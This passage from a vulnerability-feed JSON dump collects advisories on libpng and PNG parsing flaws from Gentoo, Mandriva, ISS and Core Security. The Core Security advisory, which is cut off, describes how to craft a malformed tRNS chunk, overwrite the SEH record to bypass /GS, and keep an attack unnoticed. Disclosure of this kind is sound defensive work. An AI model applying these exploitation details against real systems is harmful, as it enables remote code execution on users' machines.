- - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nNew releases of Mozilla, Mozilla Thunderbird, and Mozilla Firefox fix\r\nseveral vulnerabilities, including remote DoS and buffer overflows.\r\n\r\nBackground\r\n==========\r\n\r\nMozilla is a popular web browser that includes a mail and newsreader.\r\nMozilla Firefox is the next-generation browser from the Mozilla project\r\nthat incorporates advanced features that are yet to be incorporated\r\ninto Mozilla. Mozilla Thunderbird is the next-generation mail client\r\nfrom the Mozilla project.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 mozilla < 1.7.2 >= 1.7.2\r\n 2 mozilla-firefox < 0.9.3 >= 0.9.3\r\n 3 mozilla-thunderbird < 0.7.3 >= 0.7.3\r\n 4 mozilla-bin < 1.7.2 >= 1.7.2\r\n 5 mozilla-firefox-bin < 0.9.3 >= 0.9.3\r\n 6 mozilla-thunderbird-bin < 0.7.3 >= 0.7.3\r\n -------------------------------------------------------------------\r\n 6 affected packages on all of their supported architectures.\r\n -------------------------------------------------------------------\r\n\r\nDescription\r\n===========\r\n\r\nSeveral vulnerabilities were found in Mozilla and Mozilla Firefox:\r\n\r\n* Both browsers contain a bug in their caching which may allow the\r\n SSL icon to remain visible, even when the site in question is an\r\n insecure site.\r\n\r\n* An attacker may force the browser to execute arbitrary code from a\r\n malicious website by utilizing Mozilla's predictable cache file\r\n locations, and its ability to execute local files within the local\r\n zone.\r\n\r\nMozilla, Mozilla Firefox and Mozilla Thunderbird contain the following\r\nvulnerabilities:\r\n\r\n* All Mozilla tools use libpng for graphics. This library contains a\r\n buffer overflow which may lead to arbitrary code execution.\r\n\r\n* If a user imports a forged Certificate Authority (CA) certificate,\r\n it may overwrite and corrupt the valid CA already installed on the\r\n machine.\r\n\r\nImpact\r\n======\r\n\r\nUsers of Mozilla and Mozilla Firefox are susceptible to SSL certificate\r\nspoofing, a Denial of Service against legitimate SSL sites, crashes,\r\nand arbitrary code execution. Users of Mozilla Thunderbird are\r\nsusceptible to crashes and arbitrary code execution via malicious\r\ne-mails.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround for most of these vulnerabilities. All\r\nusers are advised to upgrade to the latest available version.\r\n\r\nResolution\r\n==========\r\n\r\nAll users should upgrade to the latest stable version:\r\n\r\n # emerge sync\r\n\r\n # emerge -pv your-version\r\n # emerge your-version\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CAN-2004-0763\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763\r\n [ 2 ] CAN-2004-0758\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758\r\n [ 3 ] CAN-2004-0597\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n [ 4 ] CAN-2004-0598\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\r\n [ 5 ] CAN-2004-0599\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200408-22.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2004 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/1.0", "edition": 1, "modified": "2004-08-25T00:00:00", "published": "2004-08-25T00:00:00", "id": "SECURITYVULNS:DOC:6651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6651", "title": "[ GLSA 200408-22 ] Mozilla, Firefox, Thunderbird: New releases fix vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-3334", "CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2006:213\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : chromium\r\n Date : November 16, 2006\r\n Affected: 2007.0, Corporate 3.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n Chromium is an OpenGL-based shoot them up game with fine graphics. It\r\n is built with a private copy of libpng, and as such could be\r\n susceptible to some of the same vulnerabilities:\r\n\r\n Buffer overflow in the png_decompress_chunk function in pngrutil.c in\r\n libpng before 1.2.12 allows context-dependent attackers to cause a\r\n denial of service and possibly execute arbitrary code via unspecified\r\n vectors related to "chunk error processing," possibly involving the\r\n "chunk_name". (CVE-2006-3334)\r\n\r\n It is questionable whether this issue is actually exploitable, but the\r\n patch to correct the issue has been included in versions < 1.2.12.\r\n\r\n In addition, an patch to address several old vulnerabilities has been\r\n applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597,\r\n CAN-2004-0598, CAN-2004-0599)\r\n\r\n Packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Mandriva Linux 2007.0:\r\n 7d7fd24f8be5c881673c11ed7fdda1d0 2007.0/i586/chromium-0.9.12-25.1mdv2007.0.i586.rpm\r\n 6175ab1df71466a69049dbda899c7c4b 2007.0/i586/chromium-setup-0.9.12-25.1mdv2007.0.i586.rpm \r\n 4dda1bbb70cce5cb6f1112995992ee1e 2007.0/SRPMS/chromium-0.9.12-25.1mdv2007.0.src.rpm\r\n\r\n Mandriva Linux 2007.0/X86_64:\r\n c2b87550ef24da183d0fe78e850080b5 2007.0/x86_64/chromium-0.9.12-25.1mdv2007.0.x86_64.rpm\r\n 91e024a81f7ff04e49f429259feaf4cd 2007.0/x86_64/chromium-setup-0.9.12-25.1mdv2007.0.x86_64.rpm \r\n 4dda1bbb70cce5cb6f1112995992ee1e 2007.0/SRPMS/chromium-0.9.12-25.1mdv2007.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 69ca9e0a4887c915bc283164b763b054 corporate/3.0/i586/chromium-0.9.12-21.1.C30mdk.i586.rpm\r\n 4ca444ca9edb34229f0d1449f2e4d82f corporate/3.0/i586/chromium-setup-0.9.12-21.1.C30mdk.i586.rpm \r\n 5007614bdfc283a0f5bb854955606ed1 corporate/3.0/SRPMS/chromium-0.9.12-21.1.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n 96a4f2c6ba97c16d04f816656a88d674 corporate/3.0/x86_64/chromium-0.9.12-21.1.C30mdk.x86_64.rpm\r\n 5b229452f499143e5d1dd73420d120aa corporate/3.0/x86_64/chromium-setup-0.9.12-21.1.C30mdk.x86_64.rpm \r\n 5007614bdfc283a0f5bb854955606ed1 corporate/3.0/SRPMS/chromium-0.9.12-21.1.C30mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\r\n\r\niD8DBQFFXMdZmqjQ0CJFipgRAn+MAKDbprCYkWVqDHH1ivaZLylt1jjxKwCeMhhY\r\n92WG8JUMC6mrEwxfMCrOhEc=\r\n=odb2\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2006-11-18T00:00:00", "published": "2006-11-18T00:00:00", "id": "SECURITYVULNS:DOC:15127", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15127", "title": "[ MDKSA-2006:213 ] - Updated chromium packages to fix embedded libpng vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-5793", "CVE-2006-3334", "CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2006:212\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : doxygen\r\n Date : November 16, 2006\r\n Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n Doxygen is a documentation system for C, C++ and IDL. It is built with\r\n a private copy of libpng, and as such could be susceptible to some of\r\n the same vulnerabilities:\r\n\r\n Buffer overflow in the png_decompress_chunk function in pngrutil.c in\r\n libpng before 1.2.12 allows context-dependent attackers to cause a\r\n denial of service and possibly execute arbitrary code via unspecified\r\n vectors related to "chunk error processing," possibly involving the\r\n "chunk_name". (CVE-2006-3334)\r\n\r\n It is questionable whether this issue is actually exploitable, but the\r\n patch to correct the issue has been included in versions < 1.2.12.\r\n\r\n Tavis Ormandy, of the Gentoo Linux Security Auditing Team, discovered a\r\n typo in png_set_sPLT() that may cause an application using libpng to\r\n read out of bounds, resulting in a crash. (CVE-2006-5793)\r\n\r\n In addition, an patch to address several old vulnerabilities has been\r\n applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597,\r\n CAN-2004-0598, CAN-2004-0599)\r\n\r\n Packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Mandriva Linux 2006.0:\r\n f85fd4b73ca06136e4346df073851e5f 2006.0/i586/doxygen-1.4.4-1.1.20060mdk.i586.rpm \r\n 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm\r\n\r\n Mandriva Linux 2006.0/X86_64:\r\n fc3e569bd8ad2aa9aea76a6f4246cfec 2006.0/x86_64/doxygen-1.4.4-1.1.20060mdk.x86_64.rpm \r\n 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm\r\n\r\n Mandriva Linux 2007.0:\r\n 9d0af28627560057e6c80e64bbacf030 2007.0/i586/doxygen-1.4.7-1.1mdv2007.0.i586.rpm \r\n f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm\r\n\r\n Mandriva Linux 2007.0/X86_64:\r\n 7fca6ebbe6f07e51de7fd771678277b4 2007.0/x86_64/doxygen-1.4.7-1.1mdv2007.0.x86_64.rpm \r\n f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 9452cede2d92671808eebe1adfc395ef corporate/3.0/i586/doxygen-1.3.5-2.1.C30mdk.i586.rpm \r\n 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n d988dc94c39515b3855116709bcc84de corporate/3.0/x86_64/doxygen-1.3.5-2.1.C30mdk.x86_64.rpm \r\n 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n a3b4702c81d1739249d59782efb316dc corporate/4.0/i586/doxygen-1.4.4-1.1.20060mlcs4.i586.rpm \r\n 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n 0568b10460c651f18fd3e2a8e76b4300 corporate/4.0/x86_64/doxygen-1.4.4-1.1.20060mlcs4.x86_64.rpm \r\n 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\r\n\r\niD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q\r\npK8OJ2vhx3DqZ400EPH5QMw=\r\n=R8Jo\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2006-11-18T00:00:00", "published": "2006-11-18T00:00:00", "id": "SECURITYVULNS:DOC:15126", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15126", "title": "[ MDKSA-2006:212 ] - Updated doxygen packages to fix embedded libpng vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "cvelist": ["CVE-2004-0597"], "description": "Internet Security Systems Protection Advisory\r\nJune 14, 2005\r\n\r\nInternet Explorer PNG Overflow\r\n\r\nSummary:\r\n\r\nISS has shipped protection for a flaw X-Force has discovered in the PNG \r\nimage processing library used in software such as Microsoft's Internet \r\nExplorer web browser. By crafting a PNG file in a malicious manner, an \r\nattacker is able to trigger a heap overflow within Internet Explorer, \r\nleading to arbitrary code execution and remote compromise.\r\n\r\nISS Protection Strategy:\r\n\r\nISS has provided preemptive protection for these vulnerabilities. We \r\nrecommend that all customers apply applicable ISS product updates. \r\n\r\nNetwork Sensor 7.0, Proventia A and G100, G200, G1200:\r\nXPU 22.30 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nProventia M and G400, G2000:\r\nXPU 1.28 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nServer Sensor 7.0:\r\nXPU 22.30 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nProventia Desktop\r\nXPU 8.0.614.1\r\nImage_PNG_tRNS_BO\r\n\r\nDesktop Protector 7.0:\r\nVersion ENR / 9/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nBlackICE Agent for Server 3.6:\r\nVersion ENR / 9/25/04\r\nImage_PNG_tRNS_BO\r\n\r\n\r\nThese updates are now available from the ISS Download Center at:\r\nhttp://www.iss.net/download.\r\n\r\nBusiness Impact:\r\n\r\nCompromise of networks and machines using affected versions of Internet \r\nExplorer may lead to exposure of confidential information, loss of \r\nproductivity, and further network compromise. An attacker would be required \r\nto cause a user to view a malicious website or email containing a \r\nmaliciously crafted image. Successful exploitation would grant an attacker \r\nthe privileges of the user viewing the image, up to and including \r\nadministrative privileges. \r\n\r\nAffected Products:\r\n\r\nWindows 2000 up to and including SP4\r\nWindows XP up to and including SP2\r\nWindows Server 2003 up to and including SP1\r\n\r\nNote: Additional versions may be affected, please contact your \r\nvendor for confirmation.\r\n\r\nDescription:\r\n\r\nPortable Network Graphics (PNG) is a common and established image standard. \r\nThis image format is widely supported in applications that view images. \r\nMicrosoft's PNG filter library is a multi-purpose implementation of PNG \r\nrendering, and is used by applications such as Internet Explorer.\r\n\r\nMicrosoft's PNG filter library contains a buffer overflow vulnerability \r\nwhen processing maliciously-crafted PNG images. The library does not \r\ncorrectly handle a specific large PNG chunk, leading to heap corruption. \r\nExploitation of this buffer overflow can lead to remote compromise of \r\naffected machines with minimal user-interaction.\r\n\r\nWhile this library is used by Internet Explorer, it is likely that additional \r\napplications make use of this library and may be affected as well. In order \r\nto exploit this vulnerability through Internet Explorer, an attacker would be \r\nrequired to induce the victim to view a web page or email message containing \r\na maliciously-crafted PNG image.\r\n\r\nThe ISS X-Press Updates detailed above have the ability to protect \r\nagainst attack attempts targeted at Internet Explorer.\r\n\r\nAdditional Information:\r\n\r\nMicrosoft Security Bulletin:\r\nhttp://www.microsoft.com/technet/security/Bulletin/MS05-025.mspx\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the \r\nname CAN-2004-0597 to this issue. This is a candidate for inclusion in \r\nthe CVE list (http://cve.mitre.org), which standardizes names for \r\nsecurity problems.\r\n\r\nCredit:\r\n\r\nThis vulnerability was discovered and researched by Mark Dowd of the ISS \r\nX-Force.\r\n\r\n______\r\n\r\nAbout Internet Security Systems (ISS)\r\nInternet Security Systems, Inc. (ISS) is the trusted security expert to\r\nglobal enterprises and world governments, providing products and services\r\nthat protect against Internet threats. An established world leader\r\nin security since 1994, ISS delivers proven cost efficiencies and\r\nreduces regulatory and business risk across the enterprise for\r\nmore than 11,000 customers worldwide. ISS products and services\r\nare based on the proactive security intelligence conducted by ISS'\r\nX-Force┬\u043e research and development team \u0442\u0410\u0423 the unequivocal world\r\nauthority in vulnerability and threat research. Headquartered\r\nin Atlanta, Internet Security Systems has additional operations\r\nthroughout the Americas, Asia, Australia, Europe and the Middle East.\r\n\r\nCopyright (c) 2005 Internet Security Systems, Inc. All rights reserved\r\nworldwide.\r\n\r\nThis document is not to be edited or altered in any way without the\r\nexpress written consent of Internet Security Systems, Inc. If you wish\r\nto reprint the whole or any part of this document, please email\r\n\r\nxforce@iss.net for permission. You may provide links to this document\r\nfrom your web site, and you may make copies of this document in\r\naccordance with the fair use doctrine of the U.S. copyright laws. \r\n\r\nDisclaimer: The information within this document may change without notice.\r\nUse of this information constitutes acceptance for use in an AS IS\r\ncondition. There are NO warranties, implied or otherwise, with regard to\r\nthis information or its use. Any use of this information is at the\r\nuser's risk. In no event shall the author/distributor (Internet Security\r\nSystems X-Force) be held liable for any damages whatsoever arising out\r\nof or in connection with the use or spread of this information.\r\n\r\nX-Force PGP Key available on MIT's PGP key server and PGP.com's key\r\nserver, as well as at http://www.iss.net/security_center/sensitive.php\r\nPlease send suggestions, updates, and comments to: X-Force\r\n\r\nxforce@iss.net of Internet Security Systems, Inc.", "edition": 1, "modified": "2005-06-15T00:00:00", "published": "2005-06-15T00:00:00", "id": "SECURITYVULNS:DOC:8854", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8854", "title": "Internet Explorer PNG Overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "cvelist": ["CVE-2004-1244", "CVE-2004-0597"], "description": "\r\n Core Security Technologies Advisory\r\n http://www.coresecurity.com\r\n\r\n MSN Messenger PNG Image Parsing Vulnerability\r\n\r\n\r\n\r\nDate Published: 2005-02-08\r\n\r\nLast Update: 2005-02-08\r\n\r\nAdvisory ID: CORE-2004-0819\r\n\r\nBugtraq ID: None currently assigned.\r\n\r\nCVE Name: CAN-2004-0597\r\n\r\nTitle: MSN Messenger PNG Image Parsing Vulnerability\r\n\r\nClass: Boundary Error Condition (Stack Buffer Overflow)\r\n\r\nRemotely Exploitable: Yes\r\n\r\nLocally Exploitable: Yes\r\n\r\nAdvisory URL:\r\n http://www.coresecurity.com/common/showdoc.php?idx=421&idxseccion=10\r\n\r\nVendors contacted:\r\n- Microsoft\r\n 2004-08-23: Notification to vendor\r\n 2004-08-23: Notification acknowledgment received from vendor\r\n 2005-02-08: Publication of fixes and advisories\r\n\r\nRelease Mode: COORDINATED RELEASE\r\n\r\n\r\n*Vulnerability Description:*\r\n\r\n MSN Messenger is a fully featured Instant Messaging (IM) program,\r\n that allows users to exchange pictures using the PNG image format and\r\n display them during conversations.\r\n\r\n A vulnerability found in the parsing of PNG images could allow an\r\n attacker to execute arbitrary code in the chat partner's machine and\r\n gain access to the system with the privileges of the user running the\r\n MSN Messenger client program.\r\n\r\n This vulnerability can be exploited on Windows 2000 (all service\r\n packs) and Windows XP (all service packs) that run vulnerable\r\n clients of MSN Messenger.\r\n\r\n Due to the particular characteristics of the MSN Messenger\r\n communications protocol, exploitation of the vulnerability is likely\r\n to pass unnoticed to network Intrusion Detection Systems (IDS),\r\n Intrusion Prevention Systems (IPS) and firewalls that do not\r\n implement decoding and normalization of the MSN Messenger protocol\r\n encapsulated within HTTP. Furthermore, its is possible to craft\r\n exploit code to compromise vulnerable systems without crashing or\r\n disrupting the normal functioning of the MSN Messenger client\r\n application and thus passing unnoticed to the end-user as well.\r\n\r\n*Vulnerable Packages:*\r\n\r\n The vulnerability was discovered and researched on the following\r\n packages:\r\n\r\n. MSN Messenger 6.1 on Windows 2000 and Windows XP\r\n. MSN Messenger 6.2 on Windows 2000 and Windows XP\r\n\r\n The vendor reported the following packages as vulnerable:\r\n\r\n. MSN Messenger 6.1\r\n. MSN Messenger 6.2\r\n. Windows Messenger 4.7.2009\r\n. Windows Messenger 4.7.3000\r\n. Windows Messenger 5.0\r\n. Windows Media Player 9 series (CVE CAN-2004-1244)\r\n\r\n\r\n*Solution/Vendor Information/Workaround:*\r\n\r\n Microsoft Security Bulletin MS05-009 provides details and fix\r\n packages or vulnerable applications. It can be found at:\r\n\r\n http://www.microsoft.com/technet/security/bulletin/MS05-009.mspx\r\n\r\n The vendor reported that following packages/versions are NOT\r\n vulnerable:\r\n\r\n. Windows Media Player 6.4\r\n. Windows Media Player 7.1\r\n. Windows Media Player for Windows XP (8.0)\r\n. Windows Media Player 9 Series for Windows XP Service Pack 2\r\n. Windows Media Player 10\r\n. MSN Messenger for Mac\r\n\r\n Additionally, mitigating actions to reduce exposure to the\r\n vulnerability are provided below, but note that these actions might\r\n not suffice to close ALL attack vectors for ALL vulnerable packages:\r\n\r\n. MSN Messenger users should not accept unsolicited chat session\r\n requests from chat partners not in their contacts list.\r\n. MSN Messenger users should disable the custom emoticons feature of\r\n MSN Messenger, to do so go to Tools->Options->Messages.\r\n. Deny execution of MSN Messenger client application using ACLs or\r\n Host-based security controls.\r\n. Block MSN Messenger communications at the network perimeter.\r\n. Filter transmission of malformed PNG images using an\r\n application-layer proxy that supports MSN Messenger protocol.\r\n\r\n Disabling the "Display Picture" feature in MSN Messenger DOES NOT\r\n prevent exploitation.\r\n\r\n Core Security Technologies has made available a sample malformed\r\n PNG file that can be used to check if an MSN Messenger client is\r\n vulnerable.\r\n\r\n The ZIP-compressed image is available at\r\n\r\n http://www.coresecurity.com/corelabs/advisories/msn-vulncheck.zip\r\n\r\n After downloading it, uncompress and save it to a work folder, open\r\n MSN Messenger and select the image as your display picture in\r\n "Tools->Change Display Picture".\r\n\r\n Vulnerable clients will either crash or display popup dialog with the\r\n following text: "Your MSN Messenger client is vulnerable"\r\n\r\n\r\n*Credits:*\r\n\r\n This vulnerability was found by Juliano Rizzo from Core Security\r\n Technologies.\r\n\r\n Chris Evans discovered previous problems related to PNG images in\r\n the libPNG open source library [1][2].\r\n\r\n\r\n*Technical Description - Exploit/Concept Code:*\r\n\r\n This vulnerability was found in MSN Messenger 6.2.0137, all technical\r\n details apply to that package and version but may be applicable to\r\n other vulnerable versions as well.\r\n\r\n The MSN Messenger protocol supports transmission of several types of\r\n images between users that are displayed during conversations.\r\n These include:\r\n\r\n . The display picture, which usually is a picture of the user.\r\n . Custom icons that are small images shown in the message line.\r\n . Thumbnails of images being transferred.\r\n . Background images.\r\n\r\n The image format used is PNG [3]. When a user selects a picture to be\r\n displayed as avatar, Messenger converts it to PNG format with a fixed\r\n size and encoding characteristics. When a conversation is initiated\r\n with a contact, the image is transmitted over the same communication\r\n channel used to exchange text messages.\r\n By sending a specially crafted PNG image an attacker can trigger a\r\n buffer overflow and execute arbitrary code on the chat partner's\r\n system.\r\n\r\n The PNG file format structure is based on chunks as described in [3].\r\n The vulnerability is present in processing intentionally malformed\r\n image chunks with specially crafted values for some fields in the\r\n IHDR and tRNS chunk types.\r\n The IHDR chunk has a "color type" field: a single-byte integer that\r\n describes the interpretation of the image data. To trigger the bug,\r\n the flags "color used" and "palette used" have to be set in the color\r\n type field, whereas the "alpha channel used" flag must not be set.\r\n Thus, the color type value has to be set to 0x03. There must also\r\n exist a tRNS chunk with enough data length (>256) to overflow a\r\n buffer and reach a function pointer address. A PLTE chunk could exist\r\n in the file, but it has to be after the tRNS chunk.\r\n\r\n[MSN Messenger clients compiled with the /GS stack-overflow protection\r\nmechanism]\r\n\r\n Although the MSN Messenger client is compiled with the /GS compiler\r\n switch that provides protection against stack-based overflows as\r\n described in [4], exploitation is not prevented in this case.\r\n\r\n The following excerpt from MSDN describes the functionality of the\r\n /GS switch:\r\n\r\n "...The /GS switch provides a "speed bump" or cookie, between the\r\n buffer and the return address. If an overflow writes over the return\r\n address, it will have to overwrite the cookie put in between it and\r\n the buffer, resulting in a new stack layout..."\r\n\r\n The protection mechanism verifies the integrity of a called\r\n function's return address. By building a longer buffer, data beyond\r\n the return address can be overwritten, including: function\r\n parameters, local variables and Structured Exception Handling records\r\n [5]. Due to the way errors are handled in the MSN Messenger client,\r\n an exception is raised after the overflow occurs but before any\r\n stack integrity verification is done. To process that exception the\r\n first SEH record in the exception handlers chain is used and, since\r\n this is located in the stack and near the overflowed buffer, the\r\n most obvious method to execute arbitrary code bypassing the\r\n protection seems to be overwriting the function pointer contained in\r\n that SEH record.\r\n\r\n To be precise, the exception is raised when the program tries to\r\n check the chunk's CRC32 and the exception code is 0xE06D7363.\r\n\r\n The tRNS chunk to accomplish the above strategy would look like the\r\n following:\r\n\r\n | chunk type |space for code|(1) SEH record | CRC32 |\r\n ["tRNS" 4 bytes][256+168 bytes ][next/eip: 8 bytes]\r\n\r\n The chunk type and crc32 fields are not copied into the stack.\r\n\r\n After taking control of the execution flow, [ESP+8] points to (1), so\r\n a possible structure for the fake SEH record could be:\r\n\r\n EB F9 ?? ?? XX XX XX XX\r\n\r\n Where EB F9 is the opcode for a jump to 5 bytes back, the next two\r\n bytes (?? ??) can have any value and the next 4 bytes are the address\r\n of a "jmp [esp+8]". In this way only a small portion of the program\r\n stack is modified and execution of arbitrary code is obtained.\r\n\r\n[Attack vectors]\r\n\r\n The vulnerability may be used to infect image files. This means that\r\n a valid PNG file could be modified to exploit vulnerable programs\r\n and still look as a harmless picture to other applications.\r\n\r\n There are 4 known attack vectors to trigger the vulnerability in\r\n the PNG image processing code:\r\n - Delivery of a malformed PNG image as display picture\r\n - Delivery of a malformed PNG image as a thumbnail\r\n - Delivery of a malformed PNG image as an icon\r\n - Delivery of a malformed PNG image as a regular file transfer\r\n offering\r\n\r\n[Detection of an attack]\r\n\r\n An important success factor for attacks targeting end-user\r\n applications is being unnoticeable by the user. Error messages,\r\n crashes and hangs are not desirable when attacking a server, but tend\r\n to be catastrophic to an attack whenever a user on the other side is\r\n interacting with the program being attacked.\r\n\r\n Some characteristics of this vulnerability and program design make\r\n the perpetration of stealth attacks easier. This means that it's\r\n possible to exploit the vulnerability, executing code while keeping\r\n the application running normally. There are several ways to achieve\r\n this:\r\n\r\n The basic idea is to return the execution flow to the application\r\n after creating a new thread or process. In the exploitation scheme\r\n described above, the code executed by the attacker may act as a\r\n legitimate exception handler by behaving in the following manner:\r\n\r\n 1. 